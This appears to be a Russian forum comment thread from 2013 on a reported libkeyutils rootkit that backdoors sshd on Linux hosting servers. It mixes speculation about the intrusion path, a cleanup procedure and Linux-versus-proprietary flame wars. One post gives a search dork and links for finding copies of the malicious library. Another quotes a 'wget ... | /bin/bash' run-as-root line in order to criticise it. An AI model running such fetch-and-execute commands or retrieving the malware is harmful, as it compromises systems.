Сообщение от Аноним (??) on 19-Фев-13, 21:06 
Ссылка в новости не имеет значения, эта тема обсуждается на web hosting talk, форумах cpanel, directadmin и миллионе других ресурсов разной степени желтизны. Тащемто, я, например, лично видел сервер с этим руткитом.
Ответить | Правка | ^ к родителю #342 | Наверх | Cообщить модератору

347. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от odesk email on 19-Фев-13, 20:42 
"Steven - sorry for being unclear. I didn't mean to imply the initial attack was from ssh; what I meant was that an iptables block on ssh stopped them reconnecting, exactly as you've seen.
Is the following consistent with what you've seen?

1. User account compromised at PHP level
2. Compromised account used to hack root and backdoor sshd via libkeyutils
3. Spam sent

The question being, how is the #2 root hack being done, #1 could be through any vulnerable site CMS etc.
"
http://www.webhostingtalk.com/showthread.php?t=1235797


Я думаю этот кусок причинной ветки новости все проясняет для профессиональных администраторов. Нельзя пускать "php" "web-софт" на системный уровень. ИМХО. Мои клиента на "панель" не ходят :-)

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

384. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 21:46 
Опять PHP! Еще лет пять назад эталоном дырявого софта был phpmyAdmin . Проходят годы, а поделки на php остаются дырявыми. Разработчике говорят "А че вы хотели мы делали php для домохозяек".
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

388. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от AlexAT (ok) on 19-Фев-13, 21:51 
Что-то мне кажется, что опять с виндозных машин пассворды поутаскивали. Слишком уж специфична ЦА - хостеры с панельками...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

411. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 22:50 
Почему тогда ни одного писка про дебианы/убунты? Их у таких хостеров поменьше - но хоть кто-то же должен был нарваться? Если б не это - я бы и сам решил, что опять вор паролей какой-то...
Ответить | Правка | ^ к родителю #388 | Наверх | Cообщить модератору

413. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от anonymousY (ok) on 19-Фев-13, 22:56 

Потому что под убунты библиотека с руткитом по другому называется?)
Ответить | Правка | ^ к родителю #411 | Наверх | Cообщить модератору

429. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 20-Фев-13, 01:17 
Всё равно хай уже б стоял...
Ответить | Правка | ^ к родителю #413 | Наверх | Cообщить модератору

425. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним email(??) on 20-Фев-13, 00:13 
dlink.ru как раз 3 дня назад сломался, ftp До сих пор не доступен
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

470. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 11:23 
Ты не справедлив. Можешь зайти на ЛЮБОЙ сайт типа БРЭНД.ru и почувствовать разницу с БРЭНД.com
Ответить | Правка | ^ к родителю #425 | Наверх | Cообщить модератору

472. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 11:37 
> Ты не справедлив. Можешь зайти на ЛЮБОЙ сайт типа БРЭНД.ru и почувствовать
> разницу с БРЭНД.com

buratino.ru : отправь sms на номер ....

buratino.com : your site name, your slogan, failed to load module news


Разницу действительно почувствовал. Жаль только, ни на одном из этих сайтов нет ни слова о чудесном напитке. :)

Ответить | Правка | ^ к родителю #470 | Наверх | Cообщить модератору

556. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним email(??) on 20-Фев-13, 20:02 
они подтвердили что не работал.
Ответить | Правка | ^ к родителю #470 | Наверх | Cообщить модератору

601. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 02:10 
> dlink.ru как раз 3 дня назад сломался, ftp До сих пор не доступен

ulmart.ru тоже ломался. Вот только причина куда как прозаичнее: эти сказочные долбо...бы забыли оплатить домен. Хотя интернет магазин и система резервирования - по сути единственное за что приходят к ним а не конкурентам. Вот так вот оно у нас и бывает - платить за домен бегут когда петух клюнул и сайт уже упал...

Ответить | Правка | ^ к родителю #425 | Наверх | Cообщить модератору

616. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от AlexAT (ok) on 21-Фев-13, 07:24 
> ulmart.ru тоже ломался. Вот только причина куда как прозаичнее: эти сказочные долбо...бы
> забыли оплатить домен. Хотя интернет магазин и система резервирования - по
> сути единственное за что приходят к ним а не конкурентам. Вот
> так вот оно у нас и бывает - платить за домен
> бегут когда петух клюнул и сайт уже упал...

Все проще - наши сказочные долбо@#ы запрещают продление домена более, чем на год. Нет, автопродление конечно же есть... Но вот авансовое продление отсутствует, как факт.

Ответить | Правка | ^ к родителю #601 | Наверх | Cообщить модератору

440. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 03:39 
Вот и утро, вот и новый день. Ну что, у этого фантома появился хотя бы файлик?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

441. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 03:58 
[root@xxx]# uname -a
Linux xxx.xxx 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

[root@xxx]# cat /etc/redhat-release
CentOS release 6.3 (Final)

Наружу торчит bind, exim, dovecot и nginx
Вроде все чисто, левых файлов нет.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

442. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 04:06 
> [root@xxx]# uname -a
> Linux xxx.xxx 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64
> x86_64 x86_64 GNU/Linux
> [root@xxx]# cat /etc/redhat-release
> CentOS release 6.3 (Final)
> Наружу торчит bind, exim, dovecot и nginx
> Вроде все чисто, левых файлов нет.

Пока, кроме СОМНИТЕЛЬНОГО товарища с Ubuntu, мы так и не увидели ни одного пострадавшего. Как и самого файлика со спамботом. Если сначала казалось, что это какая-то безалаберность, то сейчас кажется, что это вообще фейк. Массовый взлом, о котором все знают, но никто своими глазами не видел.

Ответить | Правка | ^ к родителю #441 | Наверх | Cообщить модератору

443. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 04:40 
http://www.webhostingtalk.com/showpost.php?p=8565992&postcou...

"The software versions all seem the same (i havent delved too deep yet, but a cursory glance indicates this to be so). The main difference that I can see is the php version on the infected machine is 5.3.21, with XCache and the other two VMs run 5.3.18 without XCache." - судя по всему у товарищей подключены левые репы, типа епеля.

Версия PHP из официальных репов:
[root@xxx]# php -v
PHP 5.3.3 (cli) (built: Jul  3 2012 16:53:21)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies

Ответить | Правка | ^ к родителю #442 | Наверх | Cообщить модератору

444. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 04:47 
> http://www.webhostingtalk.com/showpost.php?p=8565992&postcou...
> "The software versions all seem the same (i havent delved too deep
> yet, but a cursory glance indicates this to be so). The
> main difference that I can see is the php version on
> the infected machine is 5.3.21, with XCache and the other two
> VMs run 5.3.18 without XCache." - судя по всему у товарищей
> подключены левые репы, типа епеля.

Кроме этого вебхостингтолка, эту проблему кто-нибудь вообще видел? Может быть, там в сам этот вебхостингтолк и встроен какой-нибудь javascript-вирус для похищения паролей? :)

Ответить | Правка | ^ к родителю #443 | Наверх | Cообщить модератору

524. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 15:19 
>> http://www.webhostingtalk.com/showpost.php?p=8565992&postcou...
>> "The software versions all seem the same (i havent delved too deep
>> yet, but a cursory glance indicates this to be so). The
>> main difference that I can see is the php version on
>> the infected machine is 5.3.21, with XCache and the other two
>> VMs run 5.3.18 without XCache." - судя по всему у товарищей
>> подключены левые репы, типа епеля.
> Кроме этого вебхостингтолка, эту проблему кто-нибудь вообще видел? Может быть, там в
> сам этот вебхостингтолк и встроен какой-нибудь javascript-вирус для похищения паролей?
> :)

на сайтах хостинг панелей. Но для тебя буратинушка - это сильно сложно.

Ответить | Правка | ^ к родителю #444 | Наверх | Cообщить модератору

526. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 15:27 
> на сайтах хостинг панелей. Но для тебя буратинушка - это сильно сложно.

Не напрягайся. Начни с азбуки и арифметики. Лет через 17, глядишь, поймёшь, о чём тут вообще люди разговаривают. Хватит так откровенно тупить.

Фишка в том, что для тебя, клоун, это последняя соломинка сохранить хоть 1% лица, типа "ох, linux сломали, значит свободные системы небезопасные". При этом мы даже этих фактов не дождались. А о сохранении лица тут и речи быть не может.

Нас же, которые понимают, что свободные системы всегда будут безопаснее, и даже понимают, ПОЧЕМУ это так, интересуют совсем другие вопросы: кто устраивает эту клоунаду, зачем, чего ждать дальше и чем это может грозить простым людям. На объект вашего дежурного онанизма нам, простым людям, если честно, абсолютно наплевать. Даже если пятьсот тысяч человек с этими решетопанелями сломали, суть от этого нифига не изменится. Ну поймёт пятьсот тысяч человек, что "свободное не защищает меня от меня, это ужасно!", всем будет только лучше.

И хватит уже вести себя как престарелая девственница, и вообще - перестаньте дрочить, когда я с вами разговариваю.

Ответить | Правка | ^ к родителю #524 | Наверх | Cообщить модератору

538. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 16:42 
>> на сайтах хостинг панелей. Но для тебя буратинушка - это сильно сложно.
> Не напрягайся. Начни с азбуки и арифметики. Лет через 17, глядишь, поймёшь,
> о чём тут вообще люди разговаривают. Хватит так откровенно тупить.
> Фишка в том, что для тебя, клоун, это последняя соломинка сохранить хоть
> 1% лица, типа "ох, linux сломали, значит свободные системы небезопасные". При
> этом мы даже этих фактов не дождались. А о сохранении лица
> тут и речи быть не может.

не все свободные. А только Linux не безопасен. Как бы ты буратинушка не кичился своей элитарностью :-)

Как выясняется GNU GPL никак не защищает от проблем с безопастностью.
И наоборот показывает то о чем твердили миру - как только система начнет представлять хоть какой-то комерческий интерес для взломщиков - ее взломают. А милионы глаз якобы смотрящих в код  не защищает.

Защищает или прямые руки в настройке или малоизвестность. Остальное ... это только мечты.

Ответить | Правка | ^ к родителю #526 | Наверх | Cообщить модератору

619. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Xasd (ok) on 21-Фев-13, 09:50 
> как только система начнет представлять хоть какой-то комерческий интерес для взломщиков - ее взломают

...разумеется только в том в случае, если получится взломать :)

а если владелец системы является НЕ ТЕОРЕТИКОМ-ФИЛОСОФОМ ("мы все погибнем! следовательно ничего не нужно делать!!") -- то он должен задуматься об факторах которых понизят вероятность взлома.

отсутствие проприетарщины -- это конешно же главный (но не единственный) такой фактор!

Ответить | Правка | ^ к родителю #538 | Наверх | Cообщить модератору

683. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 21-Фев-13, 20:25 
>> как только система начнет представлять хоть какой-то комерческий интерес для взломщиков - ее взломают
> ...разумеется только в том в случае, если получится взломать :)

не бывает не ломаемых систем - бывает дорогой взлом.
такие слова были у взломщиков систем защит еще в 90х - если сумма которую получат за взлом меньше чем потраченые ресурсы - система не ломаемая. остальное - читаем сначала фразу.
Вы еще попробуйте доказать постулат что не бывает ошибок в программе.
Я с удовольствием послушаю


> а если владелец системы является НЕ ТЕОРЕТИКОМ-ФИЛОСОФОМ ("мы все погибнем! следовательно
> ничего не нужно делать!!") -- то он должен задуматься об факторах
> которых понизят вероятность взлома.
> отсутствие проприетарщины -- это конешно же главный (но не единственный) такой фактор!

главный ?! ага, ботнет из dlink, вот теперь из sshd - без пропринетаршины. И это называется главным фактором ?:)

Ответить | Правка | ^ к родителю #619 | Наверх | Cообщить модератору

461. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 09:30 
Только я вижу сдесь рекламу челябинского ISPmanager ?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

462. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 09:57 
> Только я вижу сдесь рекламу челябинского ISPmanager ?

Не знаю, что это за менеджер такой, но вот чего я не вижу, так это какого-то осязаемого взлома. Второй день жду хоть чего-нибудь.

Также я не вижу здесь маздая и кефирчика: а уж им бы точно доложили и на передовую отправили.

Ответить | Правка | ^ к родителю #461 | Наверх | Cообщить модератору

507. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Crazy Alex (ok) on 20-Фев-13, 14:06 
маздай - это  linux must _RIP_? Так он тут давно.
Ответить | Правка | ^ к родителю #462 | Наверх | Cообщить модератору

515. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 14:35 
> маздай - это  linux must _RIP_? Так он тут давно.

Зачем он здесь?

Ответить | Правка | ^ к родителю #507 | Наверх | Cообщить модератору

535. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –4 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 16:14 
>> маздай - это  linux must _RIP_? Так он тут давно.
> Зачем он здесь?

А ты зачем? от твоего потока сознания толку не много. только безудержная вера в столмана.

Ответить | Правка | ^ к родителю #515 | Наверх | Cообщить модератору

491. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от greenman (ok) on 20-Фев-13, 13:25 
Задайте гуглю запрос
intitle:"index of:" libkeyutils.so.1.9
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

492. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 13:28 
> Задайте гуглю запрос
> intitle:"index of:" libkeyutils.so.1.9

И. И что эти результаты означают? Что троян переписывает конфиг веб-сервера и делает полную копию, а google бегает за ним и переиндексируют. Если вы даёте такие данные, то и объясняйте, как их следует трактовать и какие выводы тут можно сделать - пока просто непонятно, к чему это?

Ответить | Правка | ^ к родителю #491 | Наверх | Cообщить модератору

513. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от Аноним (??) on 20-Фев-13, 14:27 
Ты или даун или толстый тролль. Чувак тебе объясняет где взять копию либки которую ты тут клянчишь.
Ответить | Правка | ^ к родителю #492 | Наверх | Cообщить модератору

514. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 14:35 
> Ты или даун или толстый тролль. Чувак тебе объясняет где взять копию
> либки которую ты тут клянчишь.

Чувак не мне отвечал. И либу по ссылкам я не нашёл, хотя я только несколько штук обошёл.

Но мне интересно, что значит одинаковое название каталога почти везде.  Троян делает симлинк рута куда-то в область веба?


Мне кажется, что это пахнет очередным серьёзным ударом по апачепыхерам с их "что вижу, то и пою". Если, конечно, фейком не окажется. Хотя, когда репутация минусовая, хуже уже не будет, доказано и виндой, и пыхом - там хоть каждый день ломай. Вот если бы все трояны для всех систем, дружно взявшись за руки, в один день устроили бы тотальное уничтожение всех данных на всех дисках, может быть, это заставило бы задуматься.


А данный случай - вообще какая-то нелепость. Никто ничего не знает, никто ничего не видел, никто проблему не локализовал, зато рассуждают о каких-то материях, как будто opensource стал внезапно хуже закрытых приложений по защищённости.

Ответить | Правка | ^ к родителю #513 | Наверх | Cообщить модератору

541. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 18:59 
дарю ссылки на живую либу.
http://ru-linux.livejournal.com/2917308.html#comments


ты действительно считаешь ниже своего достоинства пользоваться поисковиком?

Ответить | Правка | ^ к родителю #514 | Наверх | Cообщить модератору

504. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 14:00 
Кто-нибудь видел чудо сие?
Куда-нибудь может положить его?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

509. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 14:10 
> Кто-нибудь видел чудо сие?
> Куда-нибудь может положить его?

Я уже два дня подобным вопросом мучаюсь. У меня вообще иногда подозрение, что это фейк какой-то, а не как обычно (украли пароли у пользователей windows через windows-троян, и весь взлом - благодаря нашей любимой самой безопасной и защищённой ОС).

А то как-то смешно получается - какой-то серьёзный эксплоит по слухам, а ломают только каких-то чайников законченных с полупустыми хостингами. :) Тут или какой-то левый реп (который за несколько дней так и не нашли), или как обычно, всё благодаря windows. Или вообще чистый фейк, много шума из ничего. И, главное - никто ничего не знает, никто проблему не локализовал, и никто особо не чешется. Хотелось бы хоть что-то осязаемое увидеть, чтобы понять, из-за чего наши кефирчики всё пытаются возбудиться.

Ответить | Правка | ^ к родителю #504 | Наверх | Cообщить модератору

543. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 19:05 
>[оверквотинг удален]
> пользователей windows через windows-троян, и весь взлом - благодаря нашей любимой
> самой безопасной и защищённой ОС).
> А то как-то смешно получается - какой-то серьёзный эксплоит по слухам, а
> ломают только каких-то чайников законченных с полупустыми хостингами. :) Тут или
> какой-то левый реп (который за несколько дней так и не нашли),
> или как обычно, всё благодаря windows. Или вообще чистый фейк, много
> шума из ничего. И, главное - никто ничего не знает, никто
> проблему не локализовал, и никто особо не чешется. Хотелось бы хоть
> что-то осязаемое увидеть, чтобы понять, из-за чего наши кефирчики всё пытаются
> возбудиться.

http://ru-linux.livejournal.com/2917308.html#comments

тут тоже видимо зря все обсуждают. и выпукают бюлетени на всяких официальных сайтах..
Как же ты интересуешся - если кроме линки из заголовка страницы ничего не нашел?

Ответить | Правка | ^ к родителю #509 | Наверх | Cообщить модератору

682. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 21-Фев-13, 20:21 
>[оверквотинг удален]
> пользователей windows через windows-троян, и весь взлом - благодаря нашей любимой
> самой безопасной и защищённой ОС).
> А то как-то смешно получается - какой-то серьёзный эксплоит по слухам, а
> ломают только каких-то чайников законченных с полупустыми хостингами. :) Тут или
> какой-то левый реп (который за несколько дней так и не нашли),
> или как обычно, всё благодаря windows. Или вообще чистый фейк, много
> шума из ничего. И, главное - никто ничего не знает, никто
> проблему не локализовал, и никто особо не чешется. Хотелось бы хоть
> что-то осязаемое увидеть, чтобы понять, из-за чего наши кефирчики всё пытаются
> возбудиться.

ау! буратинка.. есть что ответить на ссылки?

Ответить | Правка | ^ к родителю #509 | Наверх | Cообщить модератору

690. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от бедный буратино (ok) on 22-Фев-13, 02:55 
> ау! буратинка.. есть что ответить на ссылки?

Всё уже отвечено до нас. Очередной руткит, поражающий только людей с windows и windows-привычками. В этот раз даже какой-то особенно тихий по повреждениям, и шумный по истерике. Это не уязвимость, это безалаберность.

Если 100000 человек завтра выставят пустой пароль на root, потому что прочитают об этом в свежем номере "Мурзилка Гламур", это тоже не будет уязвимость. Нет такой технологии, которая давала бы пользователю всё и при этом защищала бы его от самого себя - иначе это уже не власть.

Ответить | Правка | ^ к родителю #682 | Наверх | Cообщить модератору

697. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 22-Фев-13, 10:37 
>> ау! буратинка.. есть что ответить на ссылки?
> Всё уже отвечено до нас. Очередной руткит, поражающий только людей с windows
> и windows-привычками. В этот раз даже какой-то особенно тихий по повреждениям,
> и шумный по истерике. Это не уязвимость, это безалаберность.

да да :-) только при безалаберности в Windows - ты первый кричишь о уязвимостях. А тут стыдливо прикрываешся. Пиши еще - все уже поняли какой из тебя специалист :-)

Ответить | Правка | ^ к родителю #690 | Наверх | Cообщить модератору

517. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 14:54 
Проблемы с оборудованием? тогда жопа...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

540. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Sylvia (ok) on 20-Фев-13, 18:37 
ребят, если кто прочитал ту ветку на вебхостингтолк целиком, можно вкратце пересказать факты? а то после того как на 7й странице стали выяснять кому из них нужно завести подружку мне читать уже надоело, да и остальная дискуссия представляет собой слепое тыкание в никуда..

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

555. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +4 +/
Сообщение от drew (??) on 20-Фев-13, 19:43 
если кратко:
- ломают независимо от того где висит ССХ и видин ли он наружу (т.е. ССХ скорее всего ни при чем): "Its unlikely its ssh, found a box that had the file but ssh was disabled with a hw firewall."
- фильтровать ССХ файерволом иммет смысл для предотвращения спама

Алгоритм чистки:

1. SSH to server
2. Run 'updatedb'
3. Run 'locate libkeyutils.so.1.9'

Please follow the steps below to clear the expliot.

1. SSH to the server
2. cd /lib64/
3. rm libkeyutils.so.1.9
4. rm libkeyutils.so.1
5. ln -s libkeyutils.so.1 libkeyutils.so.1.3
6. Restart ssh
7. yum update kernel and Reboot to close any active connections

Ответить | Правка | ^ к родителю #540 | Наверх | Cообщить модератору

605. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 02:23 
> если кратко:

А также: подозрение на эскалацию прав а редхатах: https://access.redhat.com/security/cve/CVE-2013-0871

Ну то-есть, вполне может быть нечто такое:
- Ломают вебню, благо, панельки для хостинга от мутных контор доверия не внушают, а их то обладатели и вопят как раз.
- Грейдят права до рута через упомянутый баг
- Получив оные вкатывают руткитец для маскировки под пенька.

Ответить | Правка | ^ к родителю #555 | Наверх | Cообщить модератору

676. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Sylvia (ok) on 21-Фев-13, 18:58 
да,наверное что-то подобное, просто жевание насчет sshd там сбивает,
sshd с бэкдором это последствия, а не причина, ну и CVE по ядру достаточно свеж, чтобы активно им пользоваться для эксплуатации найденных дыр на вебсайтах, уже неважно каких,
одно дело взломать непривилегированный акк и поломать сайты, другое - надежно повесить забэкдоренный sshd и получить гораздо больше и на более долгий срок, ну а сколько вислоухих его не найдут пока им хостер не надерет уши это ж и не сосчитать ;)


всем спасибо за краткое резюме 50 с лишним страниц )

Ответить | Правка | ^ к родителю #555 | Наверх | Cообщить модератору

680. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Andrew email(??) on 21-Фев-13, 19:33 
>[оверквотинг удален]
> 2. Run 'updatedb'
> 3. Run 'locate libkeyutils.so.1.9'
> Please follow the steps below to clear the expliot.
> 1. SSH to the server
> 2. cd /lib64/
> 3. rm libkeyutils.so.1.9
> 4. rm libkeyutils.so.1
> 5. ln -s libkeyutils.so.1 libkeyutils.so.1.3
> 6. Restart ssh
> 7. yum update kernel and Reboot to close any active connections

У кого-то есть linux запущенный с audit программой?

Ответить | Правка | ^ к родителю #555 | Наверх | Cообщить модератору

577. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +5 +/
Сообщение от Михрютка (ok) on 20-Фев-13, 22:55 
Вкратце:

на куче RPM-based систем с хостинговыми панельками и похапе святым духом с uid=0 нормальная либа подменяется на забэкдоренную.

все, больше ничего конкретного нет (не считая деталей по бэкдору в либе).

остальное - это обмен на вебхостинге б.м. остроумными рецептами hack-proofing, вопросы "а у меня есть либа libkeyutils1.so - это оно? меня похачели?" и какой-то клоун, который по всем форумам, куда дотягивается, постит l33t SSH 0DaY Xpl0et.

а да и вот советы по вычищению бэкдоренной либы. не хватает пункта "вставить этот скрипт в крон".

Ответить | Правка | ^ к родителю #540 | Наверх | Cообщить модератору

620. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Xasd (ok) on 21-Фев-13, 09:59 
> не хватает пункта "вставить этот скрипт в крон".

:-D :-D :-D

Ответить | Правка | ^ к родителю #577 | Наверх | Cообщить модератору

678. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Sylvia (ok) on 21-Фев-13, 19:01 

> "вставить этот скрипт в крон".

учитывая что там wget http://mysite/script.sh | /bin/bash от рута
товарищ имеет неплохие шансы на немаленький ботнетик, просто заменив сей скриптец на что-то ему удобное ;)

Ответить | Правка | ^ к родителю #577 | Наверх | Cообщить модератору

666. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Buy (ok) on 21-Фев-13, 17:57 
> Третий день в Сети наблюдается массовый взлом серверов на базе Linux.

Истерично как-то звучит. Сколько тысяч? Что-то мало в нете об этом.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

668. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +4 +/
Сообщение от Dvorkin email(??) on 21-Фев-13, 17:59 
предлагаю удалить споры Linux vs ... и пр.
ветку читать невозможно, а тролли совсем ошизели
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

724. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Michael Shigorin email(ok) on 23-Фев-13, 22:08 
> предлагаю удалить споры Linux vs ... и пр.
> ветку читать невозможно, а тролли совсем ошизели

Можете помочь:
- игнорированием таковых;
- ссылкой "сообщить модератору";
- предложением Максиму помочь с модерированием.

Ответить | Правка | ^ к родителю #668 | Наверх | Cообщить модератору

670. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Dvorkin email(??) on 21-Фев-13, 18:12 
судя по тому, что у меня на общедоступных LAMP-серверах НЕ используются панели, не используется cgi/перл, не используется proftpd, ssh общедоступен и при этом всё чисто, в качестве виновника я бы в первую очередь думал о каком-нибудь suid-perl (панельки) или proftpd (так горячо любимом хостинг-провайдерами).
не думаю, что это php - он у меня есть.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

672. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от 1 (??) on 21-Фев-13, 18:39 
Нда ... походу чисто пшик ...

2Администрация
Реквестирую фичу на opennete для скрывания отдельных комментов ... Хорошо бы ещё по имени запостившего. А то продираться через все эти Linux vs BSD, GPL vs BSD напрягает уже ...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору
Часть нити удалена модератором

706. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от бедный буратино (ok) on 22-Фев-13, 11:43 
> к тому же те у кого все работает по форумам не ходят,
> и тем более не пишут в комментах

То-то я смотрю, по форумам ходят и в комментах пишут те, у кого ничего не работает и никогда не работало...

Ответить | Правка | ^ к родителю #724 | Наверх | Cообщить модератору

705. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от бедный буратино (ok) on 22-Фев-13, 11:42 
Мда. Короче, мне надоело уже быть тут самым умным. Мне больше нравится общество, где я самый глупый, и где от каждого первого можно чему-то научиться, и где можно с удовольствием слушать. А сюда уже приличные и компентные люди заходить скоро перестанут.

Я думаю, стоит вообще floss, gpl и подобное объявить вне закона, и преобразовать форум в открытый чемпионат России по мерянию известного предмета. Потому что по факту так оно и есть. Всё это очень глупо, товарищи - так себе, как очнётесь, и передайте.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

707. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Boboms (ok) on 22-Фев-13, 16:47 
> А сюда уже приличные и компентные люди заходить скоро перестанут.

Ну, политика портала может и поменяться. Нужно просто обуздать школопедов с их чухнёй, подойти более жёстко к модерированию комментов к новостям, изменив соотв. образом правила "форума". Сложного ничего нет, только волевое желание владельца.

> Всё это очень глупо, товарищи - так себе, как очнётесь, и передайте.

Это - да, если поток херни не прикратится, то профи точно суда не пойдут. ИМХО, надо "подрулить" формат Опеннета. Тогда он "расцветёт".

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

708. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 22-Фев-13, 17:31 
Не думаю, что тут что-то можно сделать. Купили все достижения за зеркальца и бусы, наши им сами всё вынесли.

Мы, конечно, победим, потому что мы - это мы :), но какой ценой и какими потерями будет достигнута эта победа...

Ответить | Правка | ^ к родителю #707 | Наверх | Cообщить модератору

711. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Boboms (ok) on 22-Фев-13, 18:47 
> ... но какой
> ценой и какими потерями будет достигнута эта победа...

http://ru.wikipedia.org/wiki/%D0%9F%D0%B...

Для дальнейшего изучения:
http://yandex.ru/yandsearch?text=%D0%B8%D1�...

Ответить | Правка | ^ к родителю #708 | Наверх | Cообщить модератору

715. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от greenman (ok) on 23-Фев-13, 10:48 
Тем временем дрвеб решил попиариться
http://news.drweb.com/show/?i=3332&lng=ru&c=14
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

728. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
